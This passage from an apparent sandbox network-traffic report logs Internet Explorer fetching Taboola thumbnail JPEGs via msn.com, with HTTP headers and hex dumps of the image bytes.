cache-mxp6951-MXP X-Cache: HIT, MISS, MISS X-Cache-Hits: 1, 0, 0 X-Timer: S1633614715.345872,VS0,VE144 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F171f8b8d6097fca0bfa9b18571e0f954.jpg X-vcl-time-ms: 144
2021-10-07 13:51:55 UTC	151	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 20 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 10 61 70 70 6c 04 00 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e4 00 0b 00 17 00 0b 00 05 00 00 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 49 59 b4 9c 44 4a 6f 7e f6 fd f9 72 e2 ec 51 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 64 65 73 63 00 00 00 fc 00 00 00 64 63 70 72 74 00 00 01 60 00 00 00 23 77 74 70 74 00 00 01 84 00 00 00 14 72 58 59 5a 00 00 01 98 00 00 00 14 67 58 59 5a 00 00 01 ac 00 00 00 14 62 58 59 5a 00 00 01 c0 00 00 00 14 72 54 52 43 00 00 01 d4 00 00 00 10 63 Data Ascii: JFIF ICC_PROFILEapplmntrRGB XYZ acspAPPLAPPL-applIYDJo~rQjdescdcprt`#wtptrXYZgXYZbXYZrTRCc
2021-10-07 13:51:55 UTC	152	IN	Data Raw: 65 aa ad 65 3d 91 c6 89 ae f5 ca 76 0b 2b cc d4 9b 56 76 90 a3 84 23 53 e4 4c 38 69 49 1d 3b 52 ca a3 d2 ee 7e a0 a7 96 fd 5f 67 c6 aa c8 17 42 46 8b c8 34 ac 71 ce b3 2e 4d a0 f9 c5 57 90 b5 08 a1 bc e7 6e d5 4f e0 68 f1 a9 2b d1 37 3a 78 6c ca 27 55 39 25 1d e8 57 75 ed b0 2b 02 da 40 22 e4 05 29 64 10 71 af 2c 49 80 69 60 ce ed 8a 48 b2 fa d7 63 58 f4 c8 3a 15 db 9b 1d b4 24 58 f1 dc c9 ab 67 14 cf 52 80 30 7a cf 4b cf b1 36 10 f0 cf 94 08 35 0b 7a 6d 94 a4 2f 78 73 a9 5a 1f ab 50 a8 89 04 87 39 ad dc 7d fc 5c e7 1e 32 d2 dd f5 ca fa 65 27 10 57 62 72 d6 91 d1 53 31 3d 68 25 10 d7 91 b5 14 56 3c e6 0a 2b 20 e8 aa 30 3a 1c 80 d8 3c 34 f0 c5 74 1a 24 5c 9c 91 19 51 9b 20 64 09 cf 56 dd 46 ca 28 2b 85 db ce 4d 81 71 93 92 97 09 24 b6 b3 e7 e0 1c ce 16 6e Data Ascii: ee=v+Vv#SL8iI;R~_gBF4q.MWnOh+7:xl'U9%Wu+@")dq,Ii`HcX:$XgR0zK65zm/xsZP9}\2e'WbrS1=h%V<+ 0:<4t$\Q dVF(+Mq$n
2021-10-07 13:51:55 UTC	153	IN	Data Raw: a3 ab ac 91 ee f4 a7 41 b8 9e 9f 4c 0f 87 43 0c 64 fa 18 b1 91 e4 80 15 4f 47 26 62 4f b2 fd b1 19 04 65 80 04 20 12 b9 54 3a 6d 71 b9 61 7b 4d 46 b1 62 70 42 d5 8b a0 31 a8 fc ab d8 1c ef 46 2d d7 33 7c 52 40 f0 3f eb c4 9f 5d 57 9d fb f1 6c 86 7f 91 07 ba c4 f5 91 1f 20 32 1f c8 0c 83 c4 8c 48 bb 50 7a 68 f1 93 d6 4d 18 ef 3e a0 ea 3e e3 5f 0d e8 c0 0d df eb e1 89 c0 0d 27 82 34 4c 10 c9 1f c4 3b f1 78 dc 91 e5 90 d7 f3 6f 58 cb e2 a6 34 3a ea 8a 7f 10 34 1a 94 ad 5c a6 56 81 23 1e 2b 90 af 45 46 46 e8 06 6c ea c3 7e ac 91 30 e4 9a f6 a9 76 78 ca a9 66 84 1c f1 fc 7e 54 ca 6e cd fe eb 1f c4 64 23 a5 ef 2b 93 de 46 07 40 8c 80 f7 d0 c6 4f 78 e0 8c 97 f4 4e 5d ad 1d e8 27 aa e1 da 6a ef 3d 22 a8 50 0f c8 d5 9e 1b 52 28 7c b9 6a 26 9e 49 22 57 b2 bd 10 ab Data Ascii: ALCdOG&bOe T:mqa{MFbpB1F-3\|R@?]Wl 2HPzhM>>_'4L;xoX4:4\V#+EFFl~0vxf~Tnd#+F@OxN]'j="PR(\|j&I"W
2021-10-07 13:51:55 UTC	155	IN	Data Raw: 70 7d cc 3b 17 8e a4 5a 3e 1a d4 55 24 d8 49 4e 57 ad bd b3 18 13 4c ae 9d 1c d4 cf fc de 39 42 60 83 d9 5b 26 53 e0 99 14 7a f8 47 9b 1e 65 7c 9d d4 73 aa 57 e6 92 d4 46 45 8f fe a5 b1 2c be 51 8e 3d c9 a1 9a ac 03 ce ae c6 a6 ce dc d0 c2 61 9f ed dc 23 b8 94 31 04 1e 4d 42 3b 7c bf 7c ed 96 16 28 89 54 c5 03 bc 8b d7 47 35 b3 78 48 87 35 d6 59 a3 40 a5 64 0f 71 58 e6 c3 57 4f 71 ae b1 4e d2 37 06 d3 d4 95 cb 3e bf 86 68 36 1a aa cc cb 2f d3 cb 14 96 dc da bd 88 de 72 cd 64 2c 97 75 5a 7e 43 53 77 5b ee 23 cf 3f 3e a7 39 c8 39 54 3a ca 6c ca 74 f1 ac 93 90 70 eb 4a d3 f9 7b 2e a9 57 b1 2c 16 23 98 95 f9 2f e8 83 c0 5c 8b 7a 38 a6 0f f0 a5 5d 06 ce 7b 62 28 23 d6 70 88 16 bc 6f 6a dd 55 4a 15 52 08 12 fc d2 41 61 a4 f2 a5 72 39 61 f9 41 bb bb fb cb 77 e7 Data Ascii: p};Z>U$INWL9B`[&SzGe\|sWFE,Q=a#1MB;\|\|(TG5xH5Y@dqXWOqN7>h6/rd,uZ~CSw[#?>99T:ltpJ{.W,#/\z8]{b(#pojUJRAar9aAw
2021-10-07 13:51:55 UTC	156	IN	Data Raw: cf b4 95 e6 63 3b fa c9 89 4e bb 2c c5 9b 19 48 5c 85 09 20 e0 45 08 09 c9 22 4f f9 6a b2 30 20 ae ff 00 84 56 e4 51 06 79 25 e2 f3 d0 99 eb ba 41 21 99 12 c8 ce 7b bf 7a ba c1 aa 85 a8 52 33 12 48 b6 63 59 7b 0c 4f 9b 77 9f a6 ca 28 24 9c 79 65 8e e7 2c ec c4 79 3f 43 35 cb f3 2a 2f 4f a7 8e d5 06 64 4d 0f 50 6e 91 4e 28 6f b5 4c 95 ca f7 9b cb 16 76 73 9a f1 67 24 44 d7 41 1d 55 c1 fe 5d b6 5a 3e 45 9f a8 c7 93 0c 98 74 42 e2 38 5c 92 67 f1 c6 95 c9 f6 46 75 9b 0d 6d 2d a5 73 05 a8 ad f1 8b d5 39 17 f6 ef 9b ea bf 1a d5 69 b9 0e b2 df 8e d7 62 ad 1a c5 04 64 76 7f 45 3c 46 15 6f c4 e5 76 2b df b5 e9 d0 0c 93 a4 93 d6 71 f8 fe 4b 2f ef 8f 50 47 73 1b 1d 95 56 d4 f2 47 52 b5 8f cf 4a b3 66 ea 17 86 b8 54 ca e9 14 3f 24 8d 9b b8 25 b9 65 a4 39 31 20 95 cb Data Ascii: c;N,H\ E"Oj0 VQy%A!{zR3HcY{Ow($ye,y?C5*/OdMPnN(oLvsg$DAU]Z>EtB8\gFum-s9ibdvE<Fov+qK/PGsVGRJfT?$%e91
2021-10-07 13:51:55 UTC	157	IN	Data Raw: 7d 6e d2 f0 db 5d da 4b 3d 7b 15 d5 3c ac 15 8c 92 b3 4a d6 5f b1 e7 6a ad 89 8f e4 f5 e8 b7 ca aa 46 d6 e7 cb 23 c1 11 fd e1 c0 fe c6 2b e1 39 c4 39 4c dc 2b 91 45 7f 3e a1 d0 87 67 c2 f6 05 0c 52 bd cd 07 15 bc 4f 27 d1 c5 ca f8 8e cf 5a c2 b4 cd 11 56 19 66 35 d8 56 f3 03 e6 95 17 c7 02 3c ed f8 8e 3b c0 f6 57 9a 29 a5 93 5d ad a9 ad a9 1d 7a b1 c1 17 eb bc 44 19 be d5 cd b8 d4 cd 4a 2b 9b 7f a5 5f 67 48 ca bb 5b 5c 2a be c6 28 2d dc bf 25 3a da 78 56 a4 46 b5 48 ac cd 3a 2e 3d 07 42 43 63 41 1b af 5e 3b b9 56 9a 24 11 e4 80 28 0a 31 21 3d 77 84 0c ff c4 00 2d 11 00 02 02 02 03 00 00 06 01 02 07 01 00 00 00 00 01 02 00 03 11 21 04 12 31 10 13 22 32 41 51 61 05 23 14 20 33 72 81 91 a1 b1 ff da 00 08 01 03 01 01 3f 00 5e 2d cd f6 a9 8d c5 b9 7d 43 0a 30 Data Ascii: }n]K={<J_jF#+99L+E>gRO'ZVf5V<;W)]zDJ+_gH[\*(-%:xVFH:.=BCcA^;V$(1!=w-!1"2AQa# 3r?^-}C0
2021-10-07 13:51:55 UTC	159	IN	Data Raw: ab e1 3c fb 85 72 66 1c 7b 62 b8 42 6c 8c 99 2e 05 dd 0a 6a 2a a8 f1 9d 45 ff 00 d1 bf 63 27 d2 6e 99 06 a4 34 90 93 f8 78 f9 bd d4 24 3e 18 a5 14 87 52 77 64 63 6d 69 e3 f2 e4 86 95 19 6d 59 76 d9 01 53 ed 12 50 49 6d 54 cd ed 3b fa 99 37 4c 8b a1 38 3a b4 64 8c 57 f1 64 9d 1e 36 e7 b9 a2 a9 19 15 a6 49 54 88 3a 8d 0b 6e de 51 34 94 6e cf 1b 1a cb 97 9e 91 2f e4 47 22 49 27 0b 3d 64 f8 b4 4a d7 74 4f a3 c7 8e dc 5f ed 93 63 e4 9e 3b 62 4e e8 7b e2 bb 1b 72 e2 8f 1b 17 e1 87 3d be cc 98 db e5 1c 9c 8e 32 14 1c e4 a3 f3 fb 17 48 ca 26 76 4f 1b 7c a3 de 52 aa b3 0e 15 8d 5b 5e da 59 3c 77 ca 2a 51 2e 52 e2 8c 58 f6 47 49 ab 4c 4c 73 51 27 99 b5 ea 78 b1 69 49 b2 c4 f4 74 88 d4 dd 1b 22 ba 42 18 df 0c 9b db 26 4a 4d b3 14 37 b4 46 35 1a 28 46 5c 3b b9 44 b7 Data Ascii: <rf{bBl.jEc'n4x$>RwdcmimYvSPImT;7L8:dWd6IT:nQ4n/G"I'=dJtO_c;bN{r=2H&vO\|R[^Y<wQ.RXGILLsQ'xiIt"B&JM7F5(F\;D
2021-10-07 13:51:55 UTC	160	IN	Data Raw: 87 b1 9a 6b 01 61 5d 08 27 fb de 1d 4f 48 39 b9 e8 1c 4d d6 f2 cf 90 a3 f2 32 60 2e 06 71 b1 9a a8 94 f5 7c c2 60 2c 86 e8 66 35 60 cb 79 2c a3 78 18 0c 13 2c c2 5c da 6d ca e9 5a 85 44 6f 86 52 26 50 95 fe a6 0f 93 36 98 e6 4b 9d 8d fa cd 61 ea 13 98 aa 00 fb 94 c1 a0 c1 90 2f 3e a0 65 1e 45 06 1f 1e bd d5 16 06 25 7d 77 12 d8 98 5a 7b 8f 79 8d 5c 8e 25 82 71 95 6d fc b7 97 75 82 e4 5e 2d 3a 4a a1 99 89 b0 17 94 ff 00 b9 44 fb 7a a5 2a b4 d8 60 8b 12 27 8b 46 fe 86 81 c8 1f ec af db 79 6a 44 02 be c2 5c 72 e9 2d ee de d3 c4 70 a7 2e 61 14 c2 6c 26 b0 c3 33 48 fd a6 14 7b 59 a3 38 44 f5 91 35 5b 00 98 0c 55 a6 2b c1 e4 f6 9e cb 35 52 a9 4c 29 b6 08 b4 d1 42 95 0c 33 75 7f 73 29 8a b5 99 6e 40 fd 26 71 14 1a 8b 80 a1 9a f4 de 1a e5 17 35 69 1e 90 a9 17 ba Data Ascii: ka]'OH9M2`.q\|`,f5`y,x,\mZDoR&P6Ka/>eE%}wZ{y\%qmu^-:JDz*`'FyjD\r-p.al&3H{Y8D5[U+5RL)B3us)n@&q5i
2021-10-07 13:51:55 UTC	161	IN	Data Raw: a8 ba f0 df 8e 70 ea 36 aa 70 b5 ff 00 e3 52 38 e2 b8 ca 46 ad 1a 1f a0 2f e8 0d 29 70 81 18 52 e2 68 52 5b 2b 82 32 1b dc 82 27 d0 e2 d1 28 f1 7d aa ae 11 8c f5 9b 4b 31 63 cc cc 5e 5d 61 bb 0b 8b c1 a9 16 dc be a2 0f ec 0e 9c ad 8d e6 ae f3 55 45 21 b3 36 5b 13 d6 6a a2 ed e9 e5 8f 22 d7 e1 2a 2f 83 c7 70 cc 03 2d 5a 0c 73 83 d4 44 6e 12 a5 14 7a 05 05 97 41 17 00 01 b4 bf 87 c4 0e 26 88 b6 f4 ea 40 dc 27 16 85 4a ec 54 9f 6f 83 90 66 b5 43 aa 85 63 8f 12 91 d9 a6 6d 91 33 2e 04 06 dd 06 f0 5c 60 88 7c 32 40 2d d4 40 f4 9c 00 0c b6 79 dc 54 ca db f7 46 4b dc 38 be 31 00 16 9b 13 83 34 7a 70 a6 6b 23 a0 f7 32 c7 cb 79 f4 6b 16 a9 f8 7b 31 c2 3f 5a 52 dc 5f 0b bf fd ca 67 75 33 4f 1b c3 53 5a 9c 47 0d b3 04 3f ac 7b ac 07 f1 5e 00 1a b4 3d ea 2e ee 93 07 Data Ascii: p6pR8F/)pRhR[+2'(}K1c^]aUE!6[j"*/p-ZsDnzA&@'JTofCcm3.\`\|2@-@yTFK814zpk#2yk{1?ZR_gu3OSZG?{^=.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49851	151.101.1.44	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-07 13:51:55 UTC	80	OUT	GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb3b730df929ed7084f256b53000dc655.jpg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: img.img-taboola.com Connection: Keep-Alive
2021-10-07 13:51:55 UTC	81	IN	HTTP/1.1 200 OK Connection: close Content-Length: 20805 Server: nginx Content-Type: image/jpeg access-control-allow-headers: X-Requested-With access-control-allow-origin: * edge-cache-tag: 457671681042610906711952871495871764303,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70 etag: "54e1a089c81ac4733c601033b8173199" last-modified: Sun, 26 Sep 2021 19:07:54 GMT status: 200 OK timing-allow-origin: * x-ratelimit-limit: 101 x-ratelimit-remaining: 99 x-ratelimit-reset: 1 x-request-id: fac2d5210125631f33479e087d783aa0 x-envoy-upstream-service-time: 68 X-backend-name: LA_DIR:3FP7YNX3LMizprTZsG7BSW--F_LA_nlb204 Cache-Control: public, max-age=31536000 Accept-Ranges: bytes Date: Thu, 07 Oct 2021 13:51:55 GMT Via: 1.1 varnish Age: 626331 X-Served-By: cache-wdc5544-WDC, cache-mxp6949-MXP X-Cache: HIT, HIT X-Cache-Hits: 1, 1 X-Timer: S1633614715.347365,VS0,VE1 Vary: ImageFormat X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fb3b730df929ed7084f256b53000dc655.jpg X-vcl-time-ms: 1
2021-10-07 13:51:55 UTC	82	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 04 04 04 04 04 04 04 05 05 04 06 06 06 06 06 09 08 07 07 08 09 0d 0a 0a 0a 0a 0a 0d 14 0d 0f 0d 0d 0f 0d 14 12 16 12 11 12 16 12 20 19 17 17 19 20 25 1f 1e 1f 25 2d 29 29 2d 39 36 39 4b 4b 64 01 09 09 09 09 09 09 0a 0b 0b 0a 0e 0f 0d 0f 0e 14 12 11 11 12 14 1e 16 17 16 17 16 1e 2e 1d 21 1d 1d 21 1d 2e 29 31 28 25 28 31 29 49 39 33 33 39 49 54 47 43 47 54 66 5b 5b 66 81 7a 81 a8 a8 e2 ff c2 00 11 08 01 37 00 cf 03 01 11 00 02 11 01 03 11 01 ff c4 00 36 00 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 00 06 05 07 04 08 01 02 03 09 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 01 02 03 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 de ac 80 00 00 00 00 00 00 00 00 00 Data Ascii: JFIF %%-))-969KKd.!!.)1(%(1)I9339ITGCGTf[[fz76
2021-10-07 13:51:55 UTC	83	IN	Data Raw: cd 52 f1 ef d7 71 29 eb 94 0b 8a cf cf 59 76 f4 9d b3 80 0a eb 0d 0b 2d e2 95 31 48 01 3c cf 2c 72 e2 2c 91 a4 b3 0c 26 28 18 36 68 94 fe e7 64 e6 f9 69 67 04 1d 6d 26 b6 8d 65 ce a6 60 99 0b a8 00 83 86 a0 0c c5 6e 2d 0a e2 e9 88 5c e5 c8 5a 03 a1 34 44 31 aa 55 9e b9 4e b7 d7 de 7d bc e5 95 da aa 03 49 4d b2 20 d8 76 34 e8 31 2d 3d 3b eb 66 c8 a5 e0 81 c3 41 4b 1c a9 09 42 b9 15 06 22 d3 2e 41 d0 7d 1a c4 e6 75 ca a3 d3 a8 d7 fa d9 bd a2 d9 9d 6a 7a e7 36 9c ea 47 a9 f5 51 fc 7b 54 b5 97 fa fb 0b d3 5a f6 d4 b7 6d 97 88 d3 f3 3c a4 09 f3 00 ab 0b 68 b4 0b 94 9e 1b 09 b1 60 d4 3a 7f 78 c1 02 cb 1f 9e d3 fd 22 be f7 ac b4 6c 69 5e 27 55 73 aa ad a9 be 44 8b 66 bb a4 ba d7 ad 94 3f a1 f9 6b b9 5f 98 04 09 22 3b 17 60 e8 4f 8c a6 00 aa 3c 9a cb 55 ef ea da Data Ascii: Rq)Yv-1H<,r,&(6hdigm&e`n-\Z4D1UN}IM v41-=;fAKB".A}ujz6GQ{TZm<h`:x"li^'UsDf?k_";`O<U
2021-10-07 13:51:55 UTC	84	IN	Data Raw: 70 51 dd ff 00 3b 0b 1c 9b c8 53 60 ef 8d 99 ed 05 bd ed fb e7 fe 55 08 58 9b 13 28 2c 7d 30 c5 e9 54 88 49 7c e3 24 13 fb 37 d7 71 48 28 cc dc 51 56 66 0f da 73 80 87 32 12 56 4f c9 f9 b0 d4 bb 11 8d 89 ff 00 de bf f5 b6 7d 4a d5 eb 74 86 d8 f9 22 a5 25 4e 8e 30 28 57 d6 e2 a8 b8 d4 fd 59 d8 4e c8 84 68 d2 f1 0f 8b 2d bc c1 a7 92 d2 ed 7d 7d 65 1d 5a 14 f5 09 7e fe 55 d5 ce fa fa c4 b1 2e 29 75 a0 1a 25 19 86 84 ff 00 de 0a 2c 4f 23 5b 7d 5d 03 a8 7b 42 98 68 2e 37 31 fa fc 56 39 9e c4 56 d7 35 13 54 a6 48 a3 80 ee a8 6a ed eb 59 4d d1 57 67 21 44 ac 52 4d aa 6a cb 96 a7 11 05 3a 0c b4 2b a0 23 3d ce f7 bd ef bf 7f 6e 73 df d5 f3 dd 6b bd 00 ca cf 79 10 4e 6c ca ca fe 46 f7 5e b8 3f c0 d9 3b df ab 60 71 d4 d6 53 02 7d 08 7c 89 6e d3 26 24 7e 63 ab b5 bf Data Ascii: pQ;S`UX(,}0TI\|$7qH(QVfs2VO}Jt"%N0(WYNh-}}eZ~U.)u%,O#[}]{Bh.71V9V5THjYMWg!DRMj:+#=nskyNlF^?;`qS}\|n&$~c
2021-10-07 13:51:55 UTC	86	IN	Data Raw: b3 1e 25 fd 4c 6e 93 e0 28 b4 a0 ab fd 5d 60 ed c0 2e 29 82 6f cd 6f d8 2b c8 d2 51 71 67 ec ed 3e f5 c6 6a e9 3e 90 01 02 82 b6 be 28 c4 8c 47 94 f6 e0 33 56 3c 94 23 f1 24 22 41 cf f2 b2 7e 35 ca 4c be fa 11 94 26 65 a3 12 a0 96 60 72 2e 4e 14 6f ad 63 05 e3 1e 79 af 61 69 a7 ad 9d 16 7b d7 9a 1a cf 6f 75 bd 7e af d7 90 f6 f6 97 d6 91 e5 ab 2d a9 29 2c b3 cb b2 18 33 22 7c 57 0f 74 33 16 34 59 70 a1 53 7a ee 76 5a 65 14 e5 05 db f9 6b 0a c6 c9 5f 9e c7 39 7a c5 72 8c 21 49 4a a8 02 b2 20 00 13 3a cd 4c 1c 0e 7e a4 92 e1 56 3c 6b 11 98 57 14 98 19 3a 5b 46 4d 15 dc bf bf e7 90 60 31 55 9e b2 d7 4f 95 ef 0d 5c e6 27 c8 35 7b 38 48 1e dd e7 b7 e3 bf 46 c0 50 9d a4 0a 7b 01 d8 03 bd 97 22 22 24 98 dc e4 b6 4d b3 0b 16 7c 77 9e 7f 13 7e 1c ae 3f 77 84 d4 27 Data Ascii: %Ln(]`.)oo+Qqg>j>(G3V<#$"A~5L&e`r.Nocyai{ou~-),3"\|Wt34YpSzvZek_9zr!IJ :L~V<kW:[FM`1UO\'5{8HFP{""$M\|w~?w'
2021-10-07 13:51:55 UTC	87	IN	Data Raw: 29 5f ac 58 90 b0 16 3b 21 9d c6 a7 5d d8 4e 6b ab 53 c3 f6 10 56 29 24 34 47 d8 c6 4e 35 c5 05 d9 7b 5c d8 f5 8e 4e 52 e7 f2 cb 72 7c 14 a3 7f 5e ad b8 24 51 c6 bc a4 5b b3 01 7a 30 4b ca 3f a8 14 79 a8 6d cf 16 d6 1b cc 5d b6 b5 2f 9a 7c b1 69 ad b8 ac cb e6 c3 83 ce ee d2 a7 d1 09 26 a9 53 cf 23 e4 4a 8b fb a5 b5 6a cf c8 ba 0b 8b 5b 20 50 62 7e 10 55 75 96 a6 ca aa 98 be 72 e2 c8 fb fb f0 61 52 ab e3 2e 4b be a0 ac 04 bc ba 6e f7 87 b3 3c 47 55 d2 e8 df b5 7d dc d7 8c e1 91 c6 52 62 22 f9 14 9f 98 33 b2 cf e8 e3 60 28 0c 0e 07 b6 cb ad c8 e6 45 7e 1a ca cf bb cb e2 69 b2 e8 f0 4a 0a ba a8 ad 93 9d 80 c6 38 00 71 18 e2 42 8c 03 99 4b dd 7e 86 d1 f8 37 da df 43 8d f5 b9 4b f0 20 ec 04 4b 15 21 05 55 fa 91 27 c3 9e ae 94 9a ae 76 72 f4 86 4d dc d5 7a 76 Data Ascii: )_X;!]NkSV)$4GN5{\NRr\|^$Q[z0K?ym]/\|i&S#Jj[ Pb~UuraR.Kn<GU}Rb"3`(E~iJ8qBK~7CK K!U'vrMzv
2021-10-07 13:51:55 UTC	88	IN	Data Raw: ce 8d f5 18 ab 8b 4b ab 43 fc e8 8a 8e c7 a8 fb 9b 78 41 21 df a0 e8 29 89 62 4d 0a c6 4d 01 8a 91 c2 d3 12 69 88 03 1d fd cb 2b 0b ab f7 db 0a 79 47 57 3c 28 ab 6d 26 ca d7 9c 09 a4 1f d4 e3 ca 3e 82 a6 bd 55 38 53 b8 f4 a6 92 66 1c ae 06 7a d5 ae 99 79 74 37 c7 c2 fa 9e 2b d8 af ad 4f f3 0b 63 b3 03 91 42 50 e0 ac a8 19 48 c1 e8 45 6a 7a 22 a2 1b 9b 2f 32 75 64 1c e3 e9 40 e7 de 82 2d e7 73 7e 11 45 87 19 20 7a 50 db 8c 83 9a 02 b8 1d 29 e4 db 44 92 69 8e d1 81 d7 dc d1 f4 67 d4 9b c5 93 29 6c a7 af 77 3e 82 a5 30 c2 a2 da 00 b1 c4 83 9c 71 fa 0a 7b 97 97 72 20 2a 3b 66 ad e0 39 0a 17 7b e3 a0 ed f3 35 6d 69 02 c2 98 54 95 98 f9 98 d4 17 c6 7d 4e 6d 36 72 ea 53 25 18 1c 6e c7 ca ac ee 21 37 f3 da e5 f0 aa 78 6e 43 73 8a bf 80 5b cc a0 1e 19 49 15 0e 41 Data Ascii: KCxA!)bMMi+yGW<(m&>U8Sfzyt7+OcBPHEjz"/2ud@-s~E zP)Dig)lw>0q{r *;f9{5miT}Nm6rS%n!7xnCs[IA
2021-10-07 13:51:55 UTC	90	IN	Data Raw: 70 59 8f 61 4e e6 67 32 10 40 ec a4 e7 03 e1 74 dd 3b da 43 4c ff 00 81 78 51 ea 69 ed b6 64 ed ca e6 a4 42 ad 41 84 7e 66 3c 54 f3 35 c3 ee 62 4a 83 c0 3f 7a aa ce c1 54 12 c7 a0 14 41 52 55 81 04 76 3e fc 10 99 a4 0b fd 23 96 35 68 54 aa 22 8d a0 61 40 a9 d6 16 8f c3 07 08 38 51 57 31 3c 45 ba 10 3a 60 f6 ab ab 8f 19 f0 bc 28 fb ed 32 c9 da 58 e7 91 0e d5 21 95 4f 19 a9 e0 b2 be f2 cd 18 cf 63 d0 d6 a5 a4 cf a7 10 fc bc 27 a3 7a 7d 7d ed 26 58 98 88 0a 81 26 49 07 f3 52 c4 62 6a 2c 24 90 c7 86 1c 82 2b 53 d5 7d a4 08 60 8d 51 07 e2 6e e4 fd f6 81 a6 c7 a8 dd b7 88 e8 3c 25 0e 23 61 f8 e9 24 5b b9 e5 b7 91 e3 93 c3 5e 70 30 56 ae a0 36 f2 ec 3d 08 24 54 79 65 68 dd 43 44 c3 05 5a b5 3d 3d ac 26 e3 98 9f f0 9f 4f 97 bb c8 20 83 82 0e 41 ab 0d 54 5c 05 86 Data Ascii: pYaNg2@t;CLxQidBA~f<T5bJ?zTARUv>#5hT"a@8QW1<E:`(2X!Oc'z}}&X&IRbj,$+S}`Qn<%#a$[^p0V6=$TyehCDZ==&O AT\
2021-10-07 13:51:55 UTC	91	IN	Data Raw: 3e 54 98 8e 56 72 8a f8 04 00 4f 1f 5a 92 58 9e ce 6b 68 ad c4 6c e8 70 c1 bb 9a b1 b5 82 d3 4d 48 ae 25 c4 ac ac 18 0c b0 c1 39 15 ed be 1d ba 40 a1 5f 6f 08 48 c9 a8 c4 91 ec 33 c8 cd 36 49 e4 f0 a4 d1 42 cd bb a9 07 f5 ab dd 4a 2b 04 0a 00 79 bf 27 a7 cd be 0d 1d e3 75 74 62 ae bd 18 55 9e b3 1b 10 b7 6b 86 fc e0 70 7e a2 a3 11 4b 86 56 0e 9e a8 73 4c 8a 31 b9 1d b8 cf 39 a5 69 48 f2 43 b0 63 ae 2b 78 81 59 a6 94 6d ed 9e 31 57 7a cb 30 31 da 92 07 77 ff 00 15 c9 24 92 49 3d 49 f8 54 77 88 ee 8d d9 0f aa 9c 52 ea ba 8a 74 b9 63 f5 00 d3 ea 9a 8c 80 83 72 40 f9 00 29 99 a4 3b 9d 99 8f a9 39 fb 7f ff c4 00 35 11 00 02 02 01 03 02 03 06 04 05 05 01 00 00 00 00 01 02 03 11 00 04 12 21 31 41 13 51 61 05 10 20 22 32 40 30 71 81 a1 14 23 42 52 91 33 43 82 b1 Data Ascii: >TVrOZXkhlpMH%9@_oH36IBJ+y'utbUkp~KVsL19iHCc+xYm1Wz01w$I=ITwRtcr@);95!1AQa "2@0q#BR3C
2021-10-07 13:51:55 UTC	92	IN	Data Raw: f5 1e 83 25 25 59 9d 89 26 89 c0 e5 4d 91 4f d4 91 df 22 95 1d 57 d7 20 87 c3 5d cc 6d 8f e3 6b 75 2a b1 bc 48 c2 d8 10 c7 cb 22 97 51 a7 e5 18 d7 97 51 9a 4d 6a 6a 86 da da e3 a8 f8 bd a1 0b 1b 94 72 00 ff 00 19 e2 f8 8a 6c 5d 76 cd 9b a1 47 62 38 14 73 45 a2 f0 cb 49 27 3f d8 3f f4 fe 36 b7 54 d1 2e c8 be a3 60 b7 96 23 ac bb d4 3d 90 48 26 ba 1c 42 d6 c1 fc f1 a9 5c 32 9d ae 39 04 66 8f 54 35 29 cf 0e bd 47 c5 aa d0 98 98 c9 12 da 75 2b dc 66 8b 4a 24 48 e5 95 46 d1 ca 2f 99 f3 38 49 3f 8b ed 0d 73 c1 b2 38 57 73 b3 53 30 fe 91 82 49 42 c9 18 1b 94 b0 6f 5b c8 7f 95 1b 28 62 4b 31 62 3b 6e ef 83 ce ba 8c 65 b3 c8 cd 3c ad a7 94 30 07 8c 47 59 11 5d 4d ab 0b 1f 67 aa f6 94 4b 31 d2 c5 27 f3 7b 9e c3 11 64 04 8b b0 1b ae 30 50 8e 3b 9a bc 8a 21 44 a9 e6 Data Ascii: %%Y&MO"W ]mku*H"QQMjjrl]vGb8sEI'??6T.`#=H&B\29fT5)Gu+fJ$HF/8I?s8WsS0IBo[(bK1b;ne<0GY]MgK1'{d0P;!D
